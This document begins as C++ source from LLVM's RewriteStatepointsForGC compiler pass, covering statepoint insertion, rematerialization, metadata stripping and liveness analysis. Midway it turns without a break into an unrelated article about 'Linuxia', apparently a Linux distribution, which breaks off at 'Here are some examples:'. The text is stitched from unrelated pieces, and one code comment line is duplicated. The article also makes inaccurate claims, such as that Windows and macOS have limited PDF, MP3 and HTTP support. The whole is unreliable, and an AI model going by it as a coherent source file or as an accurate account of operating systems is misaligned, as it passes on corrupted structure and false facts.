        ClonedValue->setName(Instr->getName() + ".remat");

        // If it is not first instruction in the chain then it uses previously
        // cloned value. We should update it to use cloned value.
        if (LastClonedValue) {
          assert(LastValue);
          ClonedValue->replaceUsesOfWith(LastValue, LastClonedValue);
#ifndef NDEBUG
          for (auto OpValue : ClonedValue->operand_values()) {
            // Assert that cloned instruction does not use any instructions from
            // this chain other than LastClonedValue
            assert(!is_contained(ChainToBase, OpValue) &&
                   "incorrect use in rematerialization chain");
            // Assert that the cloned instruction does not use the RootOfChain
            // or the AlternateLiveBase.
            assert(OpValue != RootOfChain && OpValue != AlternateLiveBase);
          }
#endif
        } else {
          // For the first instruction, replace the use of unrelocated base i.e.
          // RootOfChain/OrigRootPhi, with the corresponding PHI present in the
          // live set. They have been proved to be the same PHI nodes. Note
          // that the *only* use of the RootOfChain in the ChainToBase list is
          // the first Value in the list.
          if (RootOfChain != AlternateLiveBase)
            ClonedValue->replaceUsesOfWith(RootOfChain, AlternateLiveBase);
        }

        LastClonedValue = ClonedValue;
        LastValue = Instr;
      }
      assert(LastClonedValue);
      return LastClonedValue;
    };

    // Different cases for calls and invokes. For invokes we need to clone
    // instructions both on normal and unwind path.
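    // For a call there is a single "after the statepoint" point, so the chain
    // is cloned once, right after the call. For an invoke there is no such
    // single point: control resumes in either the normal or the unwind
    // successor, so the chain must be cloned at the first insertion point of
    // both blocks, which is why the invoke arm below runs rematerializeChain
    // twice and records both clones.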
    if (isa<CallInst>(Call)) {
      Instruction *InsertBefore = Call->getNextNode();
      assert(InsertBefore);
      Instruction *RematerializedValue = rematerializeChain(
          InsertBefore, RootOfChain, Info.PointerToBase[LiveValue]);
      Info.RematerializedValues[RematerializedValue] = LiveValue;
    } else {
      auto *Invoke = cast<InvokeInst>(Call);

      Instruction *NormalInsertBefore =
          &*Invoke->getNormalDest()->getFirstInsertionPt();
      Instruction *UnwindInsertBefore =
          &*Invoke->getUnwindDest()->getFirstInsertionPt();

      Instruction *NormalRematerializedValue = rematerializeChain(
          NormalInsertBefore, RootOfChain, Info.PointerToBase[LiveValue]);
      Instruction *UnwindRematerializedValue = rematerializeChain(
          UnwindInsertBefore, RootOfChain, Info.PointerToBase[LiveValue]);

      Info.RematerializedValues[NormalRematerializedValue] = LiveValue;
      Info.RematerializedValues[UnwindRematerializedValue] = LiveValue;
    }
  }

  // Remove rematerialized values from the live set
  for (auto LiveValue: LiveValuesToBeDeleted) {
    Info.LiveSet.remove(LiveValue);
  }
}

static bool insertParsePoints(Function &F, DominatorTree &DT,
                              TargetTransformInfo &TTI,
                              SmallVectorImpl<CallBase *> &ToUpdate) {
#ifndef NDEBUG
  // sanity check the input
  std::set<CallBase *> Uniqued;
  Uniqued.insert(ToUpdate.begin(), ToUpdate.end());
  assert(Uniqued.size() == ToUpdate.size() && "no duplicates please!");

  for (CallBase *Call : ToUpdate)
    assert(Call->getFunction() == &F);
#endif

  // When inserting gc.relocates for invokes, we need to be able to insert at
  // the top of the successor blocks. See the comment on
  // normalizeForInvokeSafepoint on exactly what is needed. Note that this step
  // may restructure the CFG.
  for (CallBase *Call : ToUpdate) {
    auto *II = dyn_cast<InvokeInst>(Call);
    if (!II)
      continue;
    normalizeForInvokeSafepoint(II->getNormalDest(), II->getParent(), DT);
    normalizeForInvokeSafepoint(II->getUnwindDest(), II->getParent(), DT);
  }

  // A list of dummy calls added to the IR to keep various values obviously
  // live in the IR. We'll remove all of these when done.
  SmallVector<CallInst *, 64> Holders;

  // Insert a dummy call with all of the deopt operands we'll need for the
  // actual safepoint insertion as arguments. This ensures reference operands
  // in the deopt argument list are considered live through the safepoint (and
  // thus makes sure they get relocated.)
  for (CallBase *Call : ToUpdate) {
    SmallVector<Value *, 64> DeoptValues;

    for (Value *Arg : GetDeoptBundleOperands(Call)) {
      assert(!isUnhandledGCPointerType(Arg->getType()) &&
             "support for FCA unimplemented");
      if (isHandledGCPointerType(Arg->getType()))
        DeoptValues.push_back(Arg);
    }

    insertUseHolderAfter(Call, DeoptValues, Holders);
  }

  SmallVector<PartiallyConstructedSafepointRecord, 64> Records(ToUpdate.size());

  // A) Identify all gc pointers which are statically live at the given call
  // site.
  findLiveReferences(F, DT, ToUpdate, Records);

  // B) Find the base pointers for each live pointer
  /* scope for caching */ {
    // Cache the 'defining value' relation used in the computation and
    // insertion of base phis and selects. This ensures that we don't insert
    // large numbers of duplicate base_phis.
    DefiningValueMapTy DVCache;

    for (size_t i = 0; i < Records.size(); i++) {
      PartiallyConstructedSafepointRecord &info = Records[i];
      findBasePointers(DT, DVCache, ToUpdate[i], info);
    }
  } // end of cache scope

  // The base phi insertion logic (for any safepoint) may have inserted new
  // instructions which are now live at some safepoint. The simplest such
  // example is:
  // loop:
  //   phi a  <-- will be a new base_phi here
  //   safepoint 1 <-- that needs to be live here
  //   gep a + 1
  //   safepoint 2
  //   br loop
  // We insert some dummy calls after each safepoint to definitely hold live
  // the base pointers which were identified for that safepoint. We'll then
  // ask liveness for _every_ base inserted to see what is now live. Then we
  // remove the dummy calls.
  Holders.reserve(Holders.size() + Records.size());
  for (size_t i = 0; i < Records.size(); i++) {
    PartiallyConstructedSafepointRecord &Info = Records[i];

    SmallVector<Value *, 128> Bases;
    for (auto Pair : Info.PointerToBase)
      Bases.push_back(Pair.second);

    insertUseHolderAfter(ToUpdate[i], Bases, Holders);
  }

  // By selecting base pointers, we've effectively inserted new uses. Thus, we
  // need to rerun liveness. We may *also* have inserted new defs, but that's
  // not the key issue.
  recomputeLiveInValues(F, DT, ToUpdate, Records);

  if (PrintBasePointers) {
    for (auto &Info : Records) {
      errs() << "Base Pairs: (w/Relocation)\n";
      for (auto Pair : Info.PointerToBase) {
        errs() << " derived ";
        Pair.first->printAsOperand(errs(), false);
        errs() << " base ";
        Pair.second->printAsOperand(errs(), false);
        errs() << "\n";
      }
    }
  }

  // It is possible that non-constant live variables have a constant base. For
  // example, a GEP with a variable offset from a global. In this case we can
  // remove it from the liveset. We already don't add constants to the liveset
  // because we assume they won't move at runtime and the GC doesn't need to be
  // informed about them. The same reasoning applies if the base is constant.
  // Note that the relocation placement code relies on this filtering for
  // correctness as it expects the base to be in the liveset, which isn't true
  // if the base is constant.
  for (auto &Info : Records)
    for (auto &BasePair : Info.PointerToBase)
      if (isa<Constant>(BasePair.second))
        Info.LiveSet.remove(BasePair.first);

  for (CallInst *CI : Holders)
    CI->eraseFromParent();

  Holders.clear();

  // In order to reduce live set of statepoint we might choose to rematerialize
  // some values instead of relocating them. This is purely an optimization and
  // does not influence correctness.
  for (size_t i = 0; i < Records.size(); i++)
    rematerializeLiveValues(ToUpdate[i], Records[i], TTI);

  // We need this to safely RAUW and delete call or invoke return values that
  // may themselves be live over a statepoint. For details, please see usage in
  // makeStatepointExplicitImpl.
  std::vector<DeferredReplacement> Replacements;

  // Now run through and replace the existing statepoints with new ones with
  // the live variables listed. We do not yet update uses of the values being
  // relocated. We have references to live variables that need to
  // survive to the last iteration of this loop. (By construction, the
  // previous statepoint can not be a live variable, thus we can and do remove
  // the old statepoint calls as we go.)
  for (size_t i = 0; i < Records.size(); i++)
    makeStatepointExplicit(DT, ToUpdate[i], Records[i], Replacements);

  ToUpdate.clear(); // prevent accidental use of invalid calls.

  for (auto &PR : Replacements)
    PR.doReplacement();

  Replacements.clear();

  for (auto &Info : Records) {
    // These live sets may contain stale Value pointers, since we replaced calls
    // with operand bundles with calls wrapped in gc.statepoint, and some of
    // those calls may have been def'ing live gc pointers. Clear these out to
    // avoid accidentally using them.
    //
    // TODO: We should create a separate data structure that does not contain
    // these live sets, and migrate to using that data structure from this point
    // onward.
    Info.LiveSet.clear();
    Info.PointerToBase.clear();
  }

  // Do all the fixups of the original live variables to their relocated selves
  SmallVector<Value *, 64> Live;
  for (size_t i = 0; i < Records.size(); i++) {
    PartiallyConstructedSafepointRecord &Info = Records[i];

    // We can't simply save the live set from the original insertion. One of
    // the live values might be the result of a call which needs a safepoint.
    // That Value* no longer exists and we need to use the new gc_result.
    // Thankfully, the live set is embedded in the statepoint (and updated), so
    // we just grab that.
    Statepoint Statepoint(Info.StatepointToken);
    Live.insert(Live.end(), Statepoint.gc_args_begin(),
                Statepoint.gc_args_end());
#ifndef NDEBUG
    // Do some basic sanity checks on our liveness results before performing
    // relocation. Relocation can and will turn mistakes in liveness results
    // into non-sensical code which is much harder to debug.
    // TODO: It would be nice to test consistency as well
    assert(DT.isReachableFromEntry(Info.StatepointToken->getParent()) &&
           "statepoint must be reachable or liveness is meaningless");
    for (Value *V : Statepoint.gc_args()) {
      if (!isa<Instruction>(V))
        // Non-instruction values trivially dominate all possible uses
        continue;
      auto *LiveInst = cast<Instruction>(V);
      assert(DT.isReachableFromEntry(LiveInst->getParent()) &&
             "unreachable values should never be live");
      assert(DT.dominates(LiveInst, Info.StatepointToken) &&
             "basic SSA liveness expectation violated by liveness analysis");
    }
#endif
  }
  unique_unsorted(Live);

#ifndef NDEBUG
  // sanity check
  for (auto *Ptr : Live)
    assert(isHandledGCPointerType(Ptr->getType()) &&
           "must be a gc pointer type");
#endif

  relocationViaAlloca(F, DT, Live, Records);
  return !Records.empty();
}

// Handles both return values and arguments for Functions and calls.
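// For example, a parameter attribute such as
//   define void @f(i8 addrspace(1)* dereferenceable(16) %p) ...
// is no longer sound once a safepoint may move the object %p points at, so
// the helper below rebuilds the attribute set without dereferenceable,
// dereferenceable_or_null and noalias at the given index.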
// Handles both return values and arguments for Functions and calls.
template <typename AttrHolder>
static void RemoveNonValidAttrAtIndex(LLVMContext &Ctx, AttrHolder &AH,
                                      unsigned Index) {
  AttrBuilder R;
  if (AH.getDereferenceableBytes(Index))
    R.addAttribute(Attribute::get(Ctx, Attribute::Dereferenceable,
                                  AH.getDereferenceableBytes(Index)));
  if (AH.getDereferenceableOrNullBytes(Index))
    R.addAttribute(Attribute::get(Ctx, Attribute::DereferenceableOrNull,
                                  AH.getDereferenceableOrNullBytes(Index)));
  if (AH.getAttributes().hasAttribute(Index, Attribute::NoAlias))
    R.addAttribute(Attribute::NoAlias);

  if (!R.empty())
    AH.setAttributes(AH.getAttributes().removeAttributes(Ctx, Index, R));
}

static void stripNonValidAttributesFromPrototype(Function &F) {
  LLVMContext &Ctx = F.getContext();

  for (Argument &A : F.args())
    if (isa<PointerType>(A.getType()))
      RemoveNonValidAttrAtIndex(Ctx, F,
                                A.getArgNo() + AttributeList::FirstArgIndex);

  if (isa<PointerType>(F.getReturnType()))
    RemoveNonValidAttrAtIndex(Ctx, F, AttributeList::ReturnIndex);
}

/// Certain metadata on instructions are invalid after running RS4GC.
/// Optimizations that run after RS4GC can incorrectly use this metadata to
/// optimize functions. We drop such metadata on the instruction.
static void stripInvalidMetadataFromInstruction(Instruction &I) {
  if (!isa<LoadInst>(I) && !isa<StoreInst>(I))
    return;
  // These are the attributes that are still valid on loads and stores after
  // RS4GC.
  // The metadata implying dereferenceability and noalias are (conservatively)
  // dropped.  This is because semantically, after RewriteStatepointsForGC
  // runs, all calls to gc.statepoint "free" the entire heap.  Also,
  // gc.statepoint can touch the entire heap including noalias objects.
  // Note: The reasoning is the same as for stripping the dereferenceability
  // and noalias attributes that are analogous to the metadata counterparts.
  // We also drop the invariant.load metadata on the load because that metadata
  // implies the address operand to the load points to memory that is never
  // changed once it became dereferenceable.  This is no longer true after
  // RS4GC.  Similar reasoning applies to invariant.group metadata, which
  // applies to loads within a group.
  unsigned ValidMetadataAfterRS4GC[] = {LLVMContext::MD_tbaa,
                                        LLVMContext::MD_range,
                                        LLVMContext::MD_alias_scope,
                                        LLVMContext::MD_nontemporal,
                                        LLVMContext::MD_nonnull,
                                        LLVMContext::MD_align,
                                        LLVMContext::MD_type};

  // Drop all metadata on the instruction other than ValidMetadataAfterRS4GC.
  I.dropUnknownNonDebugMetadata(ValidMetadataAfterRS4GC);
}
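// As a concrete example of the stripping above, a load such as:
//   %q = load i8*, i8** %p, !invariant.load !0, !dereferenceable !1, !nonnull !2
// keeps only the still-valid metadata and becomes:
//   %q = load i8*, i8** %p, !nonnull !2
// since !invariant.load and !dereferenceable may no longer hold once
// statepoints can conservatively "free" and move objects in the heap.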
static void stripNonValidDataFromBody(Function &F) {
  if (F.empty())
    return;

  LLVMContext &Ctx = F.getContext();
  MDBuilder Builder(Ctx);

  // Set of invariant.start instructions that we need to remove.
  // Use this to avoid invalidating the instruction iterator.
  SmallVector<IntrinsicInst *, 12> InvariantStartInstructions;

  for (Instruction &I : instructions(F)) {
    // invariant.start on a memory location implies that the referenced
    // memory location is constant and unchanging.  This is no longer true
    // after RewriteStatepointsForGC runs because there can be calls to
    // gc.statepoint which frees the entire heap, and the presence of
    // invariant.start allows the optimizer to sink a load of the memory
    // location past a statepoint, which is incorrect.
    if (auto *II = dyn_cast<IntrinsicInst>(&I))
      if (II->getIntrinsicID() == Intrinsic::invariant_start) {
        InvariantStartInstructions.push_back(II);
        continue;
      }

    if (MDNode *Tag = I.getMetadata(LLVMContext::MD_tbaa)) {
      MDNode *MutableTBAA = Builder.createMutableTBAAAccessTag(Tag);
      I.setMetadata(LLVMContext::MD_tbaa, MutableTBAA);
    }

    stripInvalidMetadataFromInstruction(I);

    if (auto *Call = dyn_cast<CallBase>(&I)) {
      for (int i = 0, e = Call->arg_size(); i != e; i++)
        if (isa<PointerType>(Call->getArgOperand(i)->getType()))
          RemoveNonValidAttrAtIndex(Ctx, *Call,
                                    i + AttributeList::FirstArgIndex);
      if (isa<PointerType>(Call->getType()))
        RemoveNonValidAttrAtIndex(Ctx, *Call, AttributeList::ReturnIndex);
    }
  }

  // Delete the invariant.start instructions and RAUW undef.
  for (auto *II : InvariantStartInstructions) {
    II->replaceAllUsesWith(UndefValue::get(II->getType()));
    II->eraseFromParent();
  }
}

/// Returns true if this function should be rewritten by this pass.  The main
/// point of this function is as an extension point for custom logic.
static bool shouldRewriteStatepointsIn(Function &F) {
  // TODO: This should check the GCStrategy
  if (F.hasGC()) {
    const auto &FunctionGCName = F.getGC();
    const StringRef StatepointExampleName("statepoint-example");
    const StringRef CoreCLRName("coreclr");
    return (StatepointExampleName == FunctionGCName) ||
           (CoreCLRName == FunctionGCName);
  } else
    return false;
}

static void stripNonValidData(Module &M) {
#ifndef NDEBUG
  assert(llvm::any_of(M, shouldRewriteStatepointsIn) && "precondition!");
#endif

  for (Function &F : M)
    stripNonValidAttributesFromPrototype(F);

  for (Function &F : M)
    stripNonValidDataFromBody(F);
}

bool RewriteStatepointsForGC::runOnFunction(Function &F, DominatorTree &DT,
                                            TargetTransformInfo &TTI,
                                            const TargetLibraryInfo &TLI) {
  assert(!F.isDeclaration() && !F.empty() &&
         "need function body to rewrite statepoints in");
  assert(shouldRewriteStatepointsIn(F) && "mismatch in rewrite decision");

  auto NeedsRewrite = [&TLI](Instruction &I) {
    if (const auto *Call = dyn_cast<CallBase>(&I))
      return !callsGCLeafFunction(Call, TLI) && !isStatepoint(Call);
    return false;
  };

  // Delete any unreachable statepoints so that we don't have unrewritten
  // statepoints surviving this pass.  This makes testing easier and the
  // resulting IR less confusing to human readers.
  DomTreeUpdater DTU(DT, DomTreeUpdater::UpdateStrategy::Lazy);
  bool MadeChange = removeUnreachableBlocks(F, &DTU);
  // Flush the Dominator Tree.
  DTU.getDomTree();

  // Gather all the statepoints which need to be rewritten.  Be careful to
  // only consider those in reachable code since we need to ask dominance
  // queries when rewriting.  We'll delete the unreachable ones in a moment.
  SmallVector<CallBase *, 64> ParsePointNeeded;
  for (Instruction &I : instructions(F)) {
    // TODO: only the ones with the flag set!
    if (NeedsRewrite(I)) {
      // NOTE removeUnreachableBlocks() is stronger than
      // DominatorTree::isReachableFromEntry().  In other words
      // removeUnreachableBlocks can remove some blocks for which
      // isReachableFromEntry() returns true.
      assert(DT.isReachableFromEntry(I.getParent()) &&
             "no unreachable blocks expected");
      ParsePointNeeded.push_back(cast<CallBase>(&I));
    }
  }

  // Return early if no work to do.
  if (ParsePointNeeded.empty())
    return MadeChange;

  // As a prepass, go ahead and aggressively destroy single entry phi nodes.
  // These are created by LCSSA.  They have the effect of increasing the size
  // of liveness sets for no good reason.  It may be harder to do this post
  // insertion since relocations and base phis can confuse things.
  for (BasicBlock &BB : F)
    if (BB.getUniquePredecessor()) {
      MadeChange = true;
      FoldSingleEntryPHINodes(&BB);
    }
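  // The prepass above turns LCSSA-style single-entry phis such as:
  //   exit:                                  ; preds = %loop
  //     %p.lcssa = phi i8 addrspace(1)* [ %p, %loop ]
  // into direct uses of %p, so %p.lcssa never inflates a statepoint's
  // live set.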
  // Before we start introducing relocations, we want to tweak the IR a bit to
  // avoid unfortunate code generation effects.  The main example is that we
  // want to try to make sure the comparison feeding a branch is after any
  // safepoints.  Otherwise, we end up with a comparison of pre-relocation
  // values feeding a branch after relocation.  This is semantically correct,
  // but results in extra register pressure since both the pre-relocation and
  // post-relocation copies must be available in registers.  For code without
  // relocations this is handled elsewhere, but teaching the scheduler to
  // reverse the transform we're about to do would be slightly complex.
  // Note: This may extend the live range of the inputs to the icmp and thus
  // increase the liveset of any statepoint we move over.  This is profitable
  // as long as all statepoints are in rare blocks.  If we had in-register
  // lowering for live values this would be a much safer transform.
  auto getConditionInst = [](Instruction *TI) -> Instruction * {
    if (auto *BI = dyn_cast<BranchInst>(TI))
      if (BI->isConditional())
        return dyn_cast<Instruction>(BI->getCondition());
    // TODO: Extend this to handle switches
    return nullptr;
  };
  for (BasicBlock &BB : F) {
    Instruction *TI = BB.getTerminator();
    if (auto *Cond = getConditionInst(TI))
      // TODO: Handle more than just ICmps here.  We should be able to move
      // most instructions without side effects or memory access.
      if (isa<ICmpInst>(Cond) && Cond->hasOneUse()) {
        MadeChange = true;
        Cond->moveBefore(TI);
      }
  }
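  // For example:
  //   %c = icmp eq i8 addrspace(1)* %a, %b
  //   call void @foo()                   ; will become a statepoint
  //   br i1 %c, label %t, label %f
  // becomes:
  //   call void @foo()
  //   %c = icmp eq i8 addrspace(1)* %a, %b
  //   br i1 %c, label %t, label %f
  // so the comparison runs on the relocated values rather than keeping both
  // the pre- and post-relocation copies live across the branch.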
  // Nasty workaround - The base computation code in the main algorithm
  // doesn't consider the fact that a GEP can be used to convert a scalar to a
  // vector.  The right fix for this is to integrate GEPs into the base
  // rewriting algorithm properly; this is just a short term workaround to
  // prevent crashes by canonicalizing such GEPs into fully vector GEPs.
  for (Instruction &I : instructions(F)) {
    if (!isa<GetElementPtrInst>(I))
      continue;

    unsigned VF = 0;
    for (unsigned i = 0; i < I.getNumOperands(); i++)
      if (I.getOperand(i)->getType()->isVectorTy()) {
        assert(VF == 0 ||
               VF == I.getOperand(i)->getType()->getVectorNumElements());
        VF = I.getOperand(i)->getType()->getVectorNumElements();
      }

    // It's the vector to scalar traversal through the pointer operand which
    // confuses base pointer rewriting, so limit ourselves to that case.
    if (!I.getOperand(0)->getType()->isVectorTy() && VF != 0) {
      IRBuilder<> B(&I);
      auto *Splat = B.CreateVectorSplat(VF, I.getOperand(0));
      I.setOperand(0, Splat);
      MadeChange = true;
    }
  }
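  // The canonicalization above rewrites a scalar-base / vector-index GEP like:
  //   %gep = getelementptr i32, i32* %base, <2 x i64> %offsets
  // into a fully vector GEP by splatting the base first:
  //   %base.splat = shufflevector ...   ; splat of %base
  //   %gep = getelementptr i32, <2 x i32*> %base.splat, <2 x i64> %offsets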
  MadeChange |= insertParsePoints(F, DT, TTI, ParsePointNeeded);
  return MadeChange;
}

// liveness computation via standard dataflow
// -------------------------------------------------------------------

// TODO: Consider using bitvectors for liveness, the set of potentially
// interesting values should be small and easy to pre-compute.

/// Compute the live-in set for the location rbegin starting from
/// the live-out set of the basic block
static void computeLiveInValues(BasicBlock::reverse_iterator Begin,
                                BasicBlock::reverse_iterator End,
                                SetVector<Value *> &LiveTmp) {
  for (auto &I : make_range(Begin, End)) {
    // KILL/Def - Remove this definition from LiveIn
    LiveTmp.remove(&I);

    // Don't consider *uses* in PHI nodes, we handle their contribution to
    // predecessor blocks when we seed the LiveOut sets
    if (isa<PHINode>(I))
      continue;

    // USE - Add to the LiveIn set for this instruction
    for (Value *V : I.operands()) {
      assert(!isUnhandledGCPointerType(V->getType()) &&
             "support for FCA unimplemented");
      if (isHandledGCPointerType(V->getType()) && !isa<Constant>(V)) {
        // The choice to exclude all things constant here is slightly subtle.
        // There are two independent reasons:
        // - We assume that things which are constant (from LLVM's definition)
        // do not move at runtime.  For example, the address of a global
        // variable is fixed, even though its contents may not be.
        // - Second, we can't disallow arbitrary inttoptr constants even
        // if the language frontend does.  Optimization passes are free to
        // locally exploit facts without respect to global reachability.  This
        // can create sections of code which are dynamically unreachable and
        // contain just about anything.  (see constants.ll in tests)
        LiveTmp.insert(V);
      }
    }
  }
}

static void computeLiveOutSeed(BasicBlock *BB, SetVector<Value *> &LiveTmp) {
  for (BasicBlock *Succ : successors(BB)) {
    for (auto &I : *Succ) {
      PHINode *PN = dyn_cast<PHINode>(&I);
      if (!PN)
        break;

      Value *V = PN->getIncomingValueForBlock(BB);
      assert(!isUnhandledGCPointerType(V->getType()) &&
             "support for FCA unimplemented");
      if (isHandledGCPointerType(V->getType()) && !isa<Constant>(V))
        LiveTmp.insert(V);
    }
  }
}

static SetVector<Value *> computeKillSet(BasicBlock *BB) {
  SetVector<Value *> KillSet;
  for (Instruction &I : *BB)
    if (isHandledGCPointerType(I.getType()))
      KillSet.insert(&I);
  return KillSet;
}

#ifndef NDEBUG
/// Check that the items in 'Live' dominate 'TI'.  This is used as a basic
/// sanity check for the liveness computation.
static void checkBasicSSA(DominatorTree &DT, SetVector<Value *> &Live,
                          Instruction *TI, bool TermOkay = false) {
  for (Value *V : Live) {
    if (auto *I = dyn_cast<Instruction>(V)) {
      // The terminator can be a member of the LiveOut set.  LLVM's definition
      // of instruction dominance states that V does not dominate itself.  As
      // such, we need to special case this to allow it.
      if (TermOkay && TI == I)
        continue;
      assert(DT.dominates(I, TI) &&
             "basic SSA liveness expectation violated by liveness analysis");
    }
  }
}

/// Check that all the liveness sets used during the computation of liveness
/// obey basic SSA properties.  This is useful for finding cases where we miss
/// a def.
static void checkBasicSSA(DominatorTree &DT, GCPtrLivenessData &Data,
                          BasicBlock &BB) {
  checkBasicSSA(DT, Data.LiveSet[&BB], BB.getTerminator());
  checkBasicSSA(DT, Data.LiveOut[&BB], BB.getTerminator(), true);
  checkBasicSSA(DT, Data.LiveIn[&BB], BB.getTerminator());
}
#endif

static void computeLiveInValues(DominatorTree &DT, Function &F,
                                GCPtrLivenessData &Data) {
  SmallSetVector<BasicBlock *, 32> Worklist;

  // Seed the liveness for each individual block
  for (BasicBlock &BB : F) {
    Data.KillSet[&BB] = computeKillSet(&BB);
    Data.LiveSet[&BB].clear();
    computeLiveInValues(BB.rbegin(), BB.rend(), Data.LiveSet[&BB]);

#ifndef NDEBUG
    for (Value *Kill : Data.KillSet[&BB])
      assert(!Data.LiveSet[&BB].count(Kill) && "live set contains kill");
#endif

    Data.LiveOut[&BB] = SetVector<Value *>();
    computeLiveOutSeed(&BB, Data.LiveOut[&BB]);
    Data.LiveIn[&BB] = Data.LiveSet[&BB];
    Data.LiveIn[&BB].set_union(Data.LiveOut[&BB]);
    Data.LiveIn[&BB].set_subtract(Data.KillSet[&BB]);
    if (!Data.LiveIn[&BB].empty())
      Worklist.insert(pred_begin(&BB), pred_end(&BB));
  }

  // Propagate that liveness until stable
  while (!Worklist.empty()) {
    BasicBlock *BB = Worklist.pop_back_val();

    // Compute our new liveout set, then exit early if it hasn't changed
    // despite the contribution of our successors.
    SetVector<Value *> LiveOut = Data.LiveOut[BB];
    const auto OldLiveOutSize = LiveOut.size();
    for (BasicBlock *Succ : successors(BB)) {
      assert(Data.LiveIn.count(Succ));
      LiveOut.set_union(Data.LiveIn[Succ]);
    }
    // assert: OldLiveOut is a subset of LiveOut
    if (OldLiveOutSize == LiveOut.size()) {
      // If the sets are the same size, then we didn't actually add anything
      // when unioning our successors' LiveIn.  Thus, the LiveIn of this block
      // hasn't changed.
      continue;
    }
    Data.LiveOut[BB] = LiveOut;

    // Apply the effects of this basic block
    SetVector<Value *> LiveTmp = LiveOut;
    LiveTmp.set_union(Data.LiveSet[BB]);
    LiveTmp.set_subtract(Data.KillSet[BB]);

    assert(Data.LiveIn.count(BB));
    const SetVector<Value *> &OldLiveIn = Data.LiveIn[BB];
    // assert: OldLiveIn is a subset of LiveTmp
    if (OldLiveIn.size() != LiveTmp.size()) {
      Data.LiveIn[BB] = LiveTmp;
      Worklist.insert(pred_begin(BB), pred_end(BB));
    }
  } // while (!Worklist.empty())

#ifndef NDEBUG
  // Sanity check our output against SSA properties.  This helps catch any
  // missing kills during the above iteration.
  for (BasicBlock &BB : F)
    checkBasicSSA(DT, Data, BB);
#endif
}
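// A tiny worked example of the fixed-point iteration above: given
//   entry: %a = ...            ; defines %a
//   loop:  safepoint; use %a   ; %a is live across the safepoint
//          br %loop / %exit
// the seeding pass computes
//   LiveIn(loop) = (LiveSet(loop) u LiveOut(loop)) - KillSet(loop) = {%a},
// which propagates backwards into LiveOut(entry) = {%a}; a second visit to
// the worklist changes nothing, so the solution is stable.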
static void findLiveSetAtInst(Instruction *Inst, GCPtrLivenessData &Data,
                              StatepointLiveSetTy &Out) {
  BasicBlock *BB = Inst->getParent();

  // Note: The copy is intentional and required
  assert(Data.LiveOut.count(BB));
  SetVector<Value *> LiveOut = Data.LiveOut[BB];

  // We want to handle the statepoint itself oddly.  Its call result is not
  // live (normal), nor are its arguments (unless they're used again later).
  // This adjustment is specifically what we need to relocate
  computeLiveInValues(BB->rbegin(), ++Inst->getIterator().getReverse(),
                      LiveOut);
  LiveOut.remove(Inst);
  Out.insert(LiveOut.begin(), LiveOut.end());
}

static void recomputeLiveInValues(GCPtrLivenessData &RevisedLivenessData,
                                  CallBase *Call,
                                  PartiallyConstructedSafepointRecord &Info) {
  StatepointLiveSetTy Updated;
  findLiveSetAtInst(Call, RevisedLivenessData, Updated);

  // We may have base pointers which are now live that weren't before.  We
  // need to update the PointerToBase structure to reflect this.
  for (auto V : Updated)
    if (Info.PointerToBase.insert({V, V}).second) {
      assert(isKnownBaseResult(V) &&
             "Can't find base for unexpected live value!");
      continue;
    }

#ifndef NDEBUG
  for (auto V : Updated)
    assert(Info.PointerToBase.count(V) &&
           "Must be able to find base for live value!");
#endif

  // Remove any stale base mappings - this can happen since our liveness is
  // more precise than the one inherent in the base pointer analysis.
  DenseSet<Value *> ToErase;
  for (auto KVPair : Info.PointerToBase)
    if (!Updated.count(KVPair.first))
      ToErase.insert(KVPair.first);

  for (auto *V : ToErase)
    Info.PointerToBase.erase(V);

#ifndef NDEBUG
  for (auto KVPair : Info.PointerToBase)
    assert(Updated.count(KVPair.first) && "record for non-live value");
#endif

  Info.LiveSet = Updated;
}
Linuxia: How It Works and What It Can Do

Linuxia is an open-source operating system based on the Linux kernel, the central component that manages communication between a computer's hardware and its software. Linuxia is one of the many distributions, or variants, of Linux, each with its own features, design, and philosophy. Linuxia is intended to be a free, powerful, and secure operating system that can run on many kinds of devices, from servers to desktops to embedded systems.

In this article, we will look at how Linuxia works and how it can help you. We will cover the essential parts of Linuxia, such as the kernel, the shell, and the file system. We will also describe how Linuxia interacts with the computer's hardware and software, and how it compares with other operating systems such as Windows and macOS. Finally, we will walk through some common and advanced uses of Linuxia, such as web servers, desktop environments, and embedded systems. We will also highlight some of the features and tools that Linuxia offers, such as package managers, command-line utilities, and graphical user interfaces, and show some of the ways Linuxia can be customized and configured to suit different user needs and preferences.

How Linuxia Works

Linuxia is made up of several parts that work together to provide a functional and user-friendly operating system. The main parts are:

The kernel

The kernel is the heart of Linuxia: it controls the basic operations of the computer, such as memory management, process scheduling, input/output devices, network interfaces, and security. The kernel is written in C and assembly language, and it can be compiled for different architectures, such as x86, ARM, and MIPS. Because it is open source and distributed under the GNU General Public License (GPL), the kernel can also be modified and updated by its users.

The shell

The shell is the interface between the user and the kernel: it lets the user execute commands and programs on the computer. The shell can be either graphical or text-based, depending on the user's preference and the device's capabilities. Linuxia supports various shells, such as Bash, Zsh, and Fish, each with its own syntax, features, and customization options. The shell can also run scripts, which are files containing a series of commands that are executed in order (a short example appears at the end of this section).

The file system

The file system is how Linuxia organizes and stores data on the computer, such as files, directories, and partitions. Linuxia supports several file systems, such as Ext4, Btrfs, and XFS, each with its own strengths and weaknesses. The file system can also be encrypted, compressed, and backed up using a variety of tools and methods.

Linuxia interacts with the computer's hardware and software through a series of layers: drivers, libraries, and applications. Drivers are programs that allow the kernel to communicate with hardware devices such as the keyboard, mouse, screen, and printer. Libraries are collections of functions and data that other programs can use, such as the C standard library, the GTK library, and the OpenGL library. Applications are programs that perform specific tasks for the user, such as the Firefox browser, the LibreOffice suite, and the GIMP image editor.
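As a small illustration of the scripting mentioned above, here is a minimal shell script (assuming a Bash shell; the file name backup.sh is only an example):

#!/bin/bash
# Copy the Documents folder to a backup location and report when it finished
cp -r ~/Documents ~/backup/
echo "Backup finished at $(date)"

Saving these lines to backup.sh and running bash backup.sh executes each command in order.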
Linuxia differs from other operating systems, such as Windows and macOS, in several ways:

• Linuxia is free and open source, which means anyone can use, modify, and distribute it without paying fees or royalties. Windows and macOS are proprietary and closed source: they are owned and controlled by their respective companies, and users have to pay for licenses and upgrades.

• Linuxia is modular and flexible, which means users can choose and change the components and features of the operating system according to their needs and preferences. Windows and macOS are monolithic and standardized: they have a fixed, uniform design and appearance, and users have limited options for changing them.

• Linuxia is versatile and compatible, which means it can run on a wide range of devices, from servers to desktops to embedded systems, and it supports many formats and protocols, such as PDF, MP3, and HTTP. Windows and macOS are more specialized and exclusive: they are optimized for specific kinds of devices and offer more limited support for other formats and protocols.

What Linuxia Can Do

Linuxia can do many things for you, from basic tasks to advanced projects, depending on your goals and skills. Here are some examples:

